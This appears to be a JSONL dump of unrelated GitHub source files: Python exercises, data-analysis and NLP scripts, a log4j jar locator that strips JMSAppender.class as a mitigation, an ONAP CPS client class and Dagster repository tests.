network\r\nmodel.fit(x_train, y_train,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=1,\r\n validation_data=(x_test, y_test))\r\nscore = model.evaluate(x_test, y_test, verbose=0)\r\nprint('Test loss:', score[0])\r\nprint('Test accuracy:', score[1])\r\n","repo_name":"cognitiveRobot/simpleCNN-MNIST","sub_path":"simpleCNN.py","file_name":"simpleCNN.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2180448071","text":"#basics1 \npi = 22/7\n\nradian = 32*(pi/180) #this converts 32 degrees to radian\nprint(radian) #this prints out the radian\n\n#this is for basics 2\n\nr= input(\"Please input the raduis of your sphere\") #this ask the user to input the radius\nd = float(r)\nrr =d*d #this squares the raduis\nrrr = d*d*d\n\nsurface_area = 4*pi*rr\nprint(\"the surface area is \", surface_area) # this prints out the surface area\nvolume = (4/3)*pi*rrr\nprint(\"the volume is \", volume) # this prints out the volume\n\n\n#basics3\n\nfrom datetime import datetime\nnow = datetime.now()\ndt_strig = now.strftime(\"%H:%M\")\nprint(\"the time is = \",dt_strig )\nprint(now)\n\n\n","repo_name":"konlanz/python_globalcode","sub_path":"basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17441162454","text":"# 순서있음\ndef perm_recur(level, result, visited):\n global l, n, m\n if level == m:\n return result\n for i in range(n):\n if visited[i] ==False:\n visited[i] = True\n result[level] = l[i]\n perm_recur(level+1, result, visited)\n visited[i] = False\n\ndef permutation(l, m): # 순서 있음\n n = len(l)\n result = [0]*m\n visited = [False]*n\n perm_recur(0, result, visited)\n\n# 순서 없음\ndef comb_recur(level, idx, result):\n global l, n, m\n if level == m:\n return result\n for i in range(idx, n):\n result[level] = l[i]\n comb_recur(level+1, idx+1, result)\n\ndef combination(l, m):\n result = [0]*m\n n = len(l)\n comb_recur(0, 0, result)","repo_name":"dodoyeon/SW_Academy","sub_path":"comb_perm_prac.py","file_name":"comb_perm_prac.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11870869169","text":"# https://codeup.kr/problem.php?id=6085\n# 6085 : [기초-종합] 그림 파일 저장용량 계산하기\n\n# 입력\n# w, h, b 가 공백을 두고 입력된다.\n# 단, w, h는 모두 정수이고 1~1024 이다. b는 40이하의 4의 배수이다.\n#\n# 출력\n# 필요한 저장 공간을 MB 단위로 바꾸어 출력한다.\n# 단, 소수점 셋째 자리에서 반올림하여 둘째 자리까지 출력한다.\n\nw, h, b=map(int,input().split())\n\n\ni = w * h * b / 8 / 1024 /1024\nprint(format(i, \".2f\"), \"MB\")\n\n\n","repo_name":"kim-soohyeon/codeup_100","sub_path":"codeup_6081-6098/6085.py","file_name":"6085.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26405278038","text":"from binance.client import Client\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats.stats import pearsonr\nimport statsmodels.api as sm\nfrom statsmodels.tsa.stattools import adfuller\nimport matplotlib.pyplot as plt\nimport json\nimport pika\n\nclass Candle:\n def __init__(self, args):\n self.openTime = args['time']\n self.open = args['open']\n self.high = args['high']\n self.low = args['low']\n self.close = float(args['close'])\n self.volume = float(args['volume'])\n self.closeTime = args['closeTime']\n self.quoteAssetVolume = args['assetVolume']\n self.numberOfTrades = args['trades']\n self.takerBuyBaseAssetVolume = args['buyBaseVolume']\n self.takerBuyQuoteAssetVolume = args['buyAssetVolume']\n self.ignore = args['ignored']\n\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='NEED_ANALYZE_PAIR', durable=True)\nchannel.queue_declare(queue='RESULT_ANALYZE_PAIR', durable=True)\n\nconnected = []\nold_z = '0'\n\n\ndef check_correlation(firstCurrencyCloses, secondCurrencyCloses):\n if firstCurrencyCloses.empty or secondCurrencyCloses.empty:\n print(\"No data.\")\n else:\n correlation = pearsonr(firstCurrencyCloses, secondCurrencyCloses)\n print(correlation)\n print(np.corrcoef(firstCurrencyCloses, secondCurrencyCloses))\n print('Коефицент кореляции Пирсона: ', correlation[0])\n\n\ndef check_for_stationarity(X, cutoff=0.01):\n # https://habr.com/ru/post/207160/\n # https://www.machinelearningmastery.ru/time-series-data-stationary-python/\n if adfuller(X)[0] > adfuller(X)[4]['5%']:\n print('есть единичные корни, ряд не стационарен')\n return True\n else:\n print('единичных корней нет, ряд стационарен')\n return False\n # We must observe significant p-value to convince ourselves that the series is stationary\n # pvalue = adfuller(X)[1]\n # if pvalue < cutoff:\n # return True\n # else:\n # return False\n\n\ndef get_stationarity_state(is_stationarity=False):\n stationarity_in_string = \"стационарный\"\n non_stationarity_in_string = \"нестационарный\"\n\n return stationarity_in_string if is_stationarity else non_stationarity_in_string\n\n\ndef plot_residuals(residuals):\n plt.clf()\n plt.plot(residuals, color='blue')\n plt.show()\n\n\ndef set_z_score(firstCurrencyCloses, secondCurrencyCloses):\n x = sm.add_constant(secondCurrencyCloses)\n y = firstCurrencyCloses\n model = sm.OLS(y, x).fit()\n\n resid = model.resid\n\n is_resid_stationarity = check_for_stationarity(resid)\n\n plot_residuals(resid)\n print(\"Ряд остатков валютных пар является {0}\".format(get_stationarity_state(is_resid_stationarity)))\n\n if is_resid_stationarity:\n b = model.params[0]\n\n x = secondCurrencyCloses\n\n y = firstCurrencyCloses\n\n residual = y - b * x\n #residual = secondCurrencyCloses / firstCurrencyCloses\n\n z = (residual - np.mean(residual)) / np.std(residual)\n\n # получаем числовые константы\n z_upper_limit = np.mean(z) + np.std(z)\n z_lower_limit = np.mean(z) - np.std(z)\n\n return z, z_upper_limit, z_lower_limit\n\n\ndef analysisPair(firstCurrencyData, secondCurrencyData):\n firstCurrencyData = list(map(lambda x: Candle(x), firstCurrencyData))\n secondCurrencyData = list(map(lambda x: Candle(x), secondCurrencyData))\n\n firstCurrencyClosesList = list(map(lambda x: x.close, firstCurrencyData))\n secondCurrencyClosesList = list(map(lambda x: x.close, secondCurrencyData))\n\n firstCurrencyCloses = pd.Series(firstCurrencyClosesList)\n secondCurrencyCloses = pd.Series(secondCurrencyClosesList)\n\n print('Кол-во данных для первой валюты: ' + str(len(firstCurrencyCloses)))\n print('Кол-во данных для второй валюты: ' + str(len(secondCurrencyCloses)))\n\n # TODO\n if (len(firstCurrencyCloses) != len(secondCurrencyCloses)):\n return\n\n is_stationarity_first_currency = check_for_stationarity(firstCurrencyCloses)\n is_stationarity_second_currency = check_for_stationarity(secondCurrencyCloses)\n\n # check_correlation(firstCurrencyCloses, secondCurrencyCloses)\n print('Коефицент кореляции: ', firstCurrencyCloses.corr(secondCurrencyCloses))\n\n (z, z_upper_limit, z_lower_limit) = set_z_score(firstCurrencyCloses, secondCurrencyCloses)\n\n last_z_value = z[len(z) - 1]\n strZ = str(last_z_value)\n\n print('_____Z: ' + str(last_z_value))\n plt.plot(z, color='black')\n plt.plot(np.repeat(z_upper_limit, len(z)), 'r--')\n plt.plot(np.repeat(z_lower_limit, len(z)), 'y--')\n plt.show()\n # plt.plot((secondCurrencyCloses / firstCurrencyCloses), color='black')\n # plt.axhline((secondCurrencyCloses / firstCurrencyCloses).mean(), color='red', linestyle='--')\n\n\n return z.tolist(), \\\n z_upper_limit, \\\n z_lower_limit, \\\n list(map(lambda x: x.closeTime, firstCurrencyData)), \\\n firstCurrencyClosesList, \\\n secondCurrencyClosesList\n\ndef callback(ch, method, properties, body):\n bodyParse = json.loads(body)\n z, z_upper_limit, z_lower_limit, time, price1, price2 = analysisPair(bodyParse['firstCurrencyData'], bodyParse['secondCurrencyData'])\n\n\n sendDataQMQP = {}\n sendDataQMQP['z_data'] = {}\n sendDataQMQP['messageId'] = ''\n sendDataQMQP['z_data']['z'] = z\n sendDataQMQP['z_data']['z_upper_limit'] = z_upper_limit\n sendDataQMQP['z_data']['z_lower_limit'] = z_lower_limit\n sendDataQMQP['z_data']['time'] = time\n sendDataQMQP['z_data']['price1'] = price1\n sendDataQMQP['z_data']['price2'] = price2\n sendDataQMQP['messageId'] = bodyParse['messageId']\n\n channel.basic_publish(exchange='',\n routing_key='RESULT_ANALYZE_PAIR',\n body=json.dumps(sendDataQMQP))\n\n\nchannel.basic_consume(queue='NEED_ANALYZE_PAIR',\n auto_ack=True,\n on_message_callback=callback)\n\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"EvgnEvgn/bot_trader","sub_path":"version2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8645873896","text":"import multiprocessing\nimport pandas as pd\nfrom os import path\nfrom gensim.models.doc2vec import TaggedDocument, Doc2Vec\nfrom spacy.lang.en import English\nfrom spacy.tokenizer import Tokenizer\nfrom webapp import normalize\n\nnlp = English()\ntokenizer = Tokenizer(nlp.vocab)\ncurrent_dir = path.abspath('.')\nMODEL_FILE_NAME = path.join(path.abspath('.'), 'model_file')\n\n# 导入数据 drop不需要的列\ndata = pd.read_csv(path.join(current_dir, 'tweets.csv'), index_col=0)\ndata = data.drop_duplicates(subset=['id'])\n\n\ndef process(text, *, remove_stopwords=True, remove_punct=False):\n norm = normalize(text, remove_stopwords)\n tokens = list(tokenizer(norm))\n if remove_punct:\n tokens = [t for t in tokens if not t.is_punct or t.is_space]\n return [str(token) for token in tokens]\n\n\ndata.loc[:, 'tokens'] = data.text.apply(process)\nsentences = []\nfor ind in data.index:\n tweet_tokens = data['tokens'][ind]\n sentences.append(TaggedDocument(tweet_tokens, [ind]))\n\nsize = 300\ncontext_window = 50\nmin_count = 1\nmax_iter = 200\n\nmodel = Doc2Vec(\n documents=sentences,\n min_count=min_count, # ignore words with freq less than min_count\n max_vocab_size=None,\n window=context_window, # the number of words before and after to be used as context\n size=size, # is the dimensionality of the feature vector\n workers=multiprocessing.cpu_count(),\n iter=max_iter # number of iterations (epochs) over the corpus)\n)\n\nmodel.save(MODEL_FILE_NAME)\n","repo_name":"gekrfg/data_egn_projet2","sub_path":"create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37446149008","text":"def bubble_sort(items):\n\n '''Return array of items, sorted in ascending order'''\n\n for num in range(len(items)-1,0,-1):\n for i in range(num):\n if items[i]>items[i+1]:\n temp = items[i]\n items[i] = items[i+1]\n items[i+1] = temp\n \n return bubble_sort\n\n\ndef merge_sort(items):\n\n '''Return array of items, sorted in ascending order'''\n\n if len(items) < 2:\n return items\n \n result,mid = [],int(len(items)/2)\n\n y = merge_sort(items[:mid])\n z = merge_sort(items[mid:])\n\n while (len(y) > 0) and (len(z) > 0):\n if y[0] > z[0]:result.append(z.pop(0)) \n else:result.append(y.pop(0))\n\n result.extend(y+z)\n return result\n\n\ndef quick_sort(items):\n\n '''Return array of items, sorted in ascending order'''\n\n if len(items) <= 1:\n return items\n else:\n return quick_sort([x for x in items[1:] if x < items[0]]) + \\\n [items[0]] + \\\n quick_sort([x for x in items[1:] if x >= items[0]])\n\n\n\n\n","repo_name":"Smisosenkosi/mypackage","sub_path":"mypackage-master/test/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37092578062","text":"#from main_model_transformer_saveweights import create_masks\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\n\n\nnum_layers = 4 # 编码器 里的 编码层 层数\nd_model = 128 # 词嵌入维度\ndff = 512 # 前馈网络中的节点数\nnum_heads = 8 # 多头数\nEPOCHS = 20\n# buffer\nBUFFER_SIZE = 2000 # shuffle\nBATCH_SIZE = 32\n\n\ntest_text = []\nwith open('data/test.txt','r') as f:\n test_text = f.read()\n\nnew_model = tf.keras.models.load_model('saved_model_dir')\nprint(new_model.summary())\n\ndef create_masks(inp, tar): # input target 根据每次迭代的input 和 target 来生成mask\n enc_padding_mask = create_padding_mask(inp) # 编码和解码的mask\n dec_padding_mask = create_padding_mask(inp)\n\n look_ahead_mask = create_look_ahead_mask(tf.shape(tar)[1]) # 对未生成单词的mask\n dec_target_padding_mask = create_padding_mask(tar) # 不知道\n combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask) # 取最大?怎么比较大小\n\n return enc_padding_mask, combined_mask, dec_padding_mask # 三个\n\ndef create_padding_mask(seq):\n seq = tf.cast(tf.math.equal(seq, 0), tf.float32) # 判断是否与0相等\n return seq[:, tf.newaxis, tf.newaxis, :]\n\ndef create_look_ahead_mask(size):\n mask = 1 - tf.linalg.band_part(tf.ones((size, size)), -1, 0)\n return mask\n\ndef evaluate(input_document):\n # 序列化输入,生成词索引 填充\n input_document = document_tokenizer.texts_to_sequences([input_document])\n input_document = tf.keras.preprocessing.sequence.pad_sequences(input_document, maxlen=encoder_maxlen,\n padding='post', truncating='post')\n\n # expand 拓展一个维度, 0 代表将第0维拓展\n encoder_input = tf.expand_dims(input_document[0], 0) # 输入第0个input_document?\n # 初始输入为开头标记\n decoder_input = [summary_tokenizer.word_index[\"<go>\"]]\n output = tf.expand_dims(decoder_input, 0)\n\n for i in range(decoder_maxlen):\n # 循环生成单词, 直到达到最大长度\n # mask, 动态变化\n\n # 调用之前创建的transformer, 将training置为false\n predictions, attention_weights = new_model(\n [encoder_input,output],\n training=False,\n )\n\n # 根据argmax 找到对应最大的 词索引\n predictions = predictions[:, -1:, :]\n predicted_id = tf.cast(tf.argmax(predictions, axis=-1), tf.int32)\n\n if predicted_id == summary_tokenizer.word_index[\"<stop>\"]:\n # it is down\n print(\"predict over\")\n return tf.squeeze(output, axis=0), attention_weights\n # 词索引序列\n output = tf.concat([output, predicted_id], axis=-1)\n\n return tf.squeeze(output, axis=0), attention_weights\n\n\ndef summarize(input_document):\n # not considering attention weights for now, can be used to plot attention heatmaps in the future\n # 没有使用attention weight\n summarized = evaluate(input_document=input_document)[0].numpy()\n print(\"document: \",input_document)\n summarized = np.expand_dims(summarized[1:], 0) # not printing <go> token\n return summary_tokenizer.sequences_to_texts(summarized)[0] # since there is just one translated document\n # 将token 变回文本\n\n\n\n\nnews = pd.read_excel(\"data/news_lessthan_500words.xlsx\")\n\n# 清理数据\n# news.drop(['news_id', 'url', 'pub_time', 'article_level_one', 'article_level_two','title'], axis=1, inplace=True)\nnews = news.dropna(axis='index',how='any')\n# 分开\ndocument = news['content']\nsummary = news['abstract']\n\nsummary = summary.apply(lambda x: '<go> ' + x + ' <stop>')\n\nfilters = '!\"#$%&()*+,-./:;=?@[\\\\]^_`{|}~\\t\\n'\noov_token = '<unk>'\n\ndocument_tokenizer = tf.keras.preprocessing.text.Tokenizer(oov_token=oov_token)\nsummary_tokenizer = tf.keras.preprocessing.text.Tokenizer(filters=filters, oov_token=oov_token)\n\ndocument_tokenizer.fit_on_texts(document)\nsummary_tokenizer.fit_on_texts(summary)\n\nencoder_vocab_size = len(document_tokenizer.word_index) + 1\ndecoder_vocab_size = len(summary_tokenizer.word_index) + 1\n\nencoder_maxlen = 500\ndecoder_maxlen = 70\n\nret = summarize(test_text)\nprint(ret)\n\n","repo_name":"JiangZfeng/my_text_summarization","sub_path":"predict_transformer.py","file_name":"predict_transformer.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16535563197","text":"from dataclasses import dataclass\nfrom typing import List, Optional, TYPE_CHECKING\n\nfrom .cps_element import CpsElement\n\nif TYPE_CHECKING:\n from .dataspace import Dataspace # pylint: disable=cyclic-import\n\n\n@dataclass\nclass SchemaSetModuleReference:\n \"\"\"Schema set module reference dataclass.\n\n Stores all information about module reference.\n \"\"\"\n\n namespace: str\n revision: str\n name: Optional[str] = None\n\n\nclass SchemaSet(CpsElement):\n \"\"\"Schema set class.\"\"\"\n\n def __init__(self,\n name: str,\n dataspace: \"Dataspace\",\n module_references: Optional[List[SchemaSetModuleReference]] = None) -> None:\n \"\"\"Initialize schema set class object.\n\n Args:\n name (str): Schema set name\n dataspace (Dataspace): Dataspace on which schema set was created.\n module_references (Optional[List[SchemaSetModuleReference]], optional):\n List of module references. Defaults to None.\n \"\"\"\n super().__init__()\n self.name: str = name\n self.dataspace: \"Dataspace\" = dataspace\n self.module_refences: List[SchemaSetModuleReference] = module_references \\\n if module_references else []\n\n def __repr__(self) -> str:\n \"\"\"Human readable representation of the object.\n\n Returns:\n str: Human readable string\n\n \"\"\"\n return f\"SchemaSet(name={self.name}, dataspace={self.dataspace.name})\"\n\n def delete(self) -> None:\n \"\"\"Delete schema set.\"\"\"\n self.send_message(\n \"DELETE\",\n f\"Delete {self.name} schema set\",\n f\"{self._url}/dataspaces/{self.dataspace.name}/schema-sets/{self.name}\",\n auth=self.auth\n )\n","repo_name":"onap/integration-python-onapsdk","sub_path":"src/onapsdk/cps/schemaset.py","file_name":"schemaset.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35748207521","text":"import sys\ninput = sys.stdin.readline\n\n_ = input()\nnums = list(map(int,input().split()))\nv = int(input())\nfreq = [0]*201\n\nfor n in nums:\n temp = 100 + n\n freq[temp] += 1\n\nprint(freq[100+v])","repo_name":"jihoonyou/problem-solving-2","sub_path":"boj/10807_개수 세기.py","file_name":"10807_개수 세기.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39199170964","text":"#!/usr/bin/env python3\n\nimport fnmatch\nimport os\nimport argparse\nimport PySimpleGUI as sg\ntry:\n import newzipfile as zipfile\n ziplib_found = True\nexcept ImportError:\n zipfile = None\n ziplib_found = False\n\n\ndef_pattern = 'log4j*.jar'\nparser = argparse.ArgumentParser()\nresult_list = []\n\n\ndef print_greeting():\n char_line = '-'\n char_horiz_line = '|'\n line = char_line * 40\n greetings_text = ' Dateisuche.... '\n diff_line = char_line * int((len(line) - len(greetings_text)) / 2)\n\n print(char_horiz_line + line + char_horiz_line)\n print(char_horiz_line + diff_line + greetings_text + diff_line + char_horiz_line)\n print(char_horiz_line + line + char_horiz_line)\n\n\ndef gui_start():\n # Layout für das Suchfenster\n layout = [[sg.Text('Bitte Suchmuster eingeben:')],\n [sg.InputText('log4*.jar')], [sg.Checkbox('JMSAppender.class löschen?')],\n [sg.Submit(), sg.Cancel()]]\n\n window = sg.Window('Dateisuche...', layout)\n # Event und Text-tupel\n\n while True:\n event, values = window.read()\n if event == sg.WINDOW_CLOSED:\n break\n elif event == 'Cancel':\n break\n elif event == 'Submit':\n break\n window.close()\n # Text auslesen\n text_input = values[0]\n check_del = values[1]\n return text_input, check_del, event\n\n\ndef gui_popup_result(result_data):\n layout = [[sg.Listbox(result_data, expand_x=True, expand_y=True)], [sg.Button('OK', key='OK')]]\n window = sg.Window('Ergebnis', layout, resizable=True, size=(800, 600), finalize=True)\n\n while True:\n event, values = window.read()\n\n if event == sg.WINDOW_CLOSED:\n break\n elif event == 'OK':\n break\n else:\n print('Ende')\n window.close()\n\n\ndef search(patterns, loc):\n for path, dirs, files in os.walk(loc):\n for file in fnmatch.filter(files, patterns):\n yield os.path.join(path, file)\n\n\ndef argparser():\n parser.add_argument('--default', '-d', nargs='?', const=def_pattern,\n required=False,\n help='Without an argument the default search pattern \"log4*.jar\" is used '\n '- with an argument you can set your own search pattern')\n\n parser.add_argument('--remove', '-r', nargs='?', const=def_pattern,\n required=False,\n help='Remove JMSAppender.class from archive log4j.jar (newzipfile lib required)')\n args = parser.parse_args()\n # Alles im Dict speichern\n arg_dic = vars(args)\n # print(arg_dic)\n return arg_dic\n\n\ndef locate(args, remove, guimode):\n no_more_data = 'Keine weiteren Dateien gefunden!\\n'\n err_module = '>>> Fehler beim Löschen: Modul newzipfile nicht gefunden. Keine Dateien modifiziert! <<<\\n'\n location = os.path.dirname(os.path.abspath(__file__))\n empty_obj = object()\n result_list.append('Pattern \\'%s\\' übergeben' % args)\n\n result = search(args, location)\n # Elemente aus generator ausgeben\n for element in result:\n result_list.append(element)\n # Option zum Löschen aus Archiv der JMSAppender.class\n if remove and ziplib_found:\n with zipfile.ZipFile(element, 'a') as z:\n z.remove(f\"org/apache/log4j/net/JMSAppender.class\")\n\n # Bei leerem generator Meldung, dass keine weiteren Ergebnisse gefunden wurden\n if next(result, empty_obj) == empty_obj:\n result_list.append(no_more_data)\n if remove and ziplib_found is False:\n result_list.append(err_module)\n\n if guimode:\n gui_popup_result(result_list)\n else:\n for element in result_list:\n print(element)\n\n\ndef main():\n # Argparser\n args_dic = argparser()\n # Anhand der Keys im Dict Optionen aufrufen\n if args_dic['default'] is not None and args_dic['remove'] is None: # DEFAULT\n print_greeting()\n locate(args_dic['default'], False, False)\n elif args_dic['default'] is None and args_dic['remove'] is not None: # REMOVE\n print_greeting()\n locate(args_dic['remove'], True, False)\n elif args_dic['default'] is None and args_dic['remove'] is None: # NONE\n text_input, check_del, event = gui_start()\n if event == 'Submit':\n locate(text_input, check_del, True)\n\n\nmain()\n","repo_name":"r1ddl3rz/fileLocator","sub_path":"fileLocator.py","file_name":"fileLocator.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9278653293","text":"# ******************* PROBLEM STATEMENT\n#Given a string s and an integer k, return the length of the longest substring of s that contains at most k distinct characters.\n\n\n# ******************* NOTES\n# 1. I assumed that s would only contain alphabetic chars. This assumption turned out to be false\n# 2. Note while loop that shifts left pointer until distinct < k true. Having WHILE loop w/ invariant helps in these type of problems\n# 3. Note default dict accepts lambda fxn. Go over lambda fxn in python\n\n# ******************* SOLUTION\n# Time Complexity: O(2n) -> O(n)\n\nfrom collections import defaultdict\n\nclass Solution:\n @staticmethod\n def lengthOfLongestSubstringKDistinct(s: str, k: int) -> int:\n alpha = defaultdict(lambda: 0)\n left, right, distinct, longest = 0, 0, 0, 0\n\n while right < len(s):\n if alpha[ord(s[right])] == 0:\n distinct += 1\n\n alpha[ord(s[right])] += 1\n\n # cases where left needs to shift\n if distinct > k:\n while distinct > k:\n alpha[ord(s[left])] -= 1\n if alpha[ord(s[left])] == 0:\n distinct -= 1\n left += 1\n\n # otherwise shift right\n longest = max(longest, right - left + 1)\n right += 1\n\n return longest\n# class Solution:\n# @staticmethod\n# def lengthOfLongestSubstringKDistinct(s: str, k: int) -> int:\n# alpha = [0] * 26\n# left, right, distinct, longest = 0, 0, 0, 0\n#\n# while right < len(s):\n# if alpha[ord(s[right]) - ord('a')] == 0:\n# distinct += 1\n#\n# alpha[ord(s[right]) - ord('a')] += 1\n#\n# # cases where left needs to shift\n# if distinct > k:\n# while distinct > k:\n# alpha[ord(s[left]) - ord('a')] -= 1\n# if alpha[ord(s[left]) - ord('a')] == 0:\n# distinct -= 1\n# left += 1\n#\n# # otherwise shift right\n# longest = max(longest, right - left + 1)\n# right += 1\n#\n# return longest\n\nif __name__ == '__main__':\n assert Solution.lengthOfLongestSubstringKDistinct('aa', 1) == 2\n assert Solution.lengthOfLongestSubstringKDistinct('eceba', 2) == 3\n\n\n\n","repo_name":"eee37/technical-problems","sub_path":"LeetCode/Patterns/SlidingWindow/longest_substring_k_distinct.py","file_name":"longest_substring_k_distinct.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9890797717","text":"import dagster._check as check\nimport pytest\nfrom dagster import (\n AssetKey,\n AssetsDefinition,\n AssetSelection,\n DagsterInvalidDefinitionError,\n JobDefinition,\n RepositoryDefinition,\n asset,\n define_asset_job,\n op,\n repository,\n resource,\n with_resources,\n)\nfrom dagster._core.definitions.cacheable_assets import (\n AssetsDefinitionCacheableData,\n CacheableAssetsDefinition,\n)\nfrom dagster._core.definitions.repository_definition import (\n PendingRepositoryDefinition,\n RepositoryLoadData,\n)\n\nfrom .test_repository import define_empty_job, define_simple_job, define_with_resources_job\n\n\ndef define_cacheable_and_uncacheable_assets():\n class MyCacheableAssets(CacheableAssetsDefinition):\n def compute_cacheable_data(self):\n return [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"upstream\": AssetKey(\"upstream\")},\n keys_by_output_name={\"result\": AssetKey(self.unique_id)},\n )\n ]\n\n def build_definitions(self, data):\n @op(name=self.unique_id)\n def _op(upstream):\n return upstream + 1\n\n return [\n AssetsDefinition.from_op(\n _op,\n keys_by_input_name=cd.keys_by_input_name,\n keys_by_output_name=cd.keys_by_output_name,\n )\n for cd in data\n ]\n\n @asset\n def upstream():\n return 1\n\n @asset\n def downstream(a, b):\n return a + b\n\n return [MyCacheableAssets(\"a\"), MyCacheableAssets(\"b\"), upstream, downstream]\n\n\n@repository\ndef pending_repo():\n return [\n define_empty_job(),\n define_simple_job(),\n *define_with_resources_job(),\n define_cacheable_and_uncacheable_assets(),\n define_asset_job(\n \"all_asset_job\",\n selection=AssetSelection.keys(\n AssetKey(\"a\"), AssetKey(\"b\"), AssetKey(\"upstream\"), AssetKey(\"downstream\")\n ),\n ),\n ]\n\n\ndef test_resolve_empty():\n assert isinstance(pending_repo, PendingRepositoryDefinition)\n with pytest.raises(check.CheckError):\n repo = pending_repo.reconstruct_repository_definition(repository_load_data=None)\n repo = pending_repo.compute_repository_definition()\n assert isinstance(repo, RepositoryDefinition)\n assert isinstance(repo.get_job(\"simple_job\"), JobDefinition)\n assert isinstance(repo.get_job(\"all_asset_job\"), JobDefinition)\n\n\ndef test_resolve_missing_key():\n assert isinstance(pending_repo, PendingRepositoryDefinition)\n with pytest.raises(check.CheckError, match=\"No metadata found\"):\n pending_repo.reconstruct_repository_definition(\n repository_load_data=RepositoryLoadData(\n cached_data_by_key={\n \"a\": [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"upstream\": AssetKey(\"upstream\")},\n keys_by_output_name={\"result\": AssetKey(\"a\")},\n )\n ]\n }\n )\n )\n\n\ndef test_resolve_wrong_data():\n assert isinstance(pending_repo, PendingRepositoryDefinition)\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n r\"Input asset .*\\\"b\\\".* is not produced by any of the provided asset ops and is not one\"\n r\" of the provided sources\"\n ),\n ):\n pending_repo.reconstruct_repository_definition(\n repository_load_data=RepositoryLoadData(\n cached_data_by_key={\n \"a\": [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"upstream\": AssetKey(\"upstream\")},\n keys_by_output_name={\"result\": AssetKey(\"a\")},\n )\n ],\n \"b\": [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"upstream\": AssetKey(\"upstream\")},\n keys_by_output_name={\"result\": AssetKey(\"BAD_ASSET_KEY\")},\n )\n ],\n }\n )\n )\n\n\ndef define_resource_dependent_cacheable_and_uncacheable_assets():\n class ResourceDependentCacheableAsset(CacheableAssetsDefinition):\n def __init__(self):\n super().__init__(\"res_downstream\")\n\n def compute_cacheable_data(self):\n return [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"res_upstream\": AssetKey(\"res_upstream\")},\n keys_by_output_name={\"result\": AssetKey(\"res_midstream\")},\n )\n ]\n\n def build_definitions(self, data):\n @op(name=\"res_midstream\", required_resource_keys={\"foo\"})\n def _op(context, res_upstream):\n return res_upstream + context.resources.foo\n\n return [\n AssetsDefinition.from_op(\n _op,\n keys_by_input_name=cd.keys_by_input_name,\n keys_by_output_name=cd.keys_by_output_name,\n )\n for cd in data\n ]\n\n @asset(required_resource_keys={\"foo\"})\n def res_upstream(context):\n return context.resources.foo\n\n @asset(required_resource_keys={\"foo\"})\n def res_downstream(context, res_midstream):\n return res_midstream + context.resources.foo\n\n return [ResourceDependentCacheableAsset(), res_upstream, res_downstream]\n\n\ndef test_resolve_no_resources():\n \"\"\"Test that loading a repo with a resource-dependent cacheable asset fails if the resource is not\n provided.\n \"\"\"\n with pytest.raises(DagsterInvalidDefinitionError):\n try:\n\n @repository\n def resource_dependent_repo_no_resources():\n return [\n define_resource_dependent_cacheable_and_uncacheable_assets(),\n define_asset_job(\n \"all_asset_job\",\n ),\n ]\n\n resource_dependent_repo_no_resources.compute_repository_definition()\n except DagsterInvalidDefinitionError as e:\n # Make sure we get an error for the cacheable asset in particular\n assert \"res_midstream\" in str(e)\n raise e\n\n\ndef test_resolve_with_resources():\n \"\"\"Test that loading a repo with a resource-dependent cacheable asset succeeds if the resource is\n provided.\n \"\"\"\n\n @resource\n def foo_resource():\n return 3\n\n @repository\n def resource_dependent_repo_with_resources():\n return [\n with_resources(\n define_resource_dependent_cacheable_and_uncacheable_assets(), {\"foo\": foo_resource}\n ),\n define_asset_job(\n \"all_asset_job\",\n ),\n ]\n\n repo = resource_dependent_repo_with_resources.compute_repository_definition()\n assert isinstance(repo, RepositoryDefinition)\n assert isinstance(repo.get_job(\"all_asset_job\"), JobDefinition)\n\n\ndef test_group_cached_assets():\n \"\"\"Test that with_attributes works properly on cacheable assets.\"\"\"\n\n class MyCacheableAssets(CacheableAssetsDefinition):\n def compute_cacheable_data(self):\n return [\n AssetsDefinitionCacheableData(\n keys_by_input_name={}, keys_by_output_name={\"result\": AssetKey(self.unique_id)}\n )\n ]\n\n def build_definitions(self, data):\n @op(name=self.unique_id)\n def _op():\n return 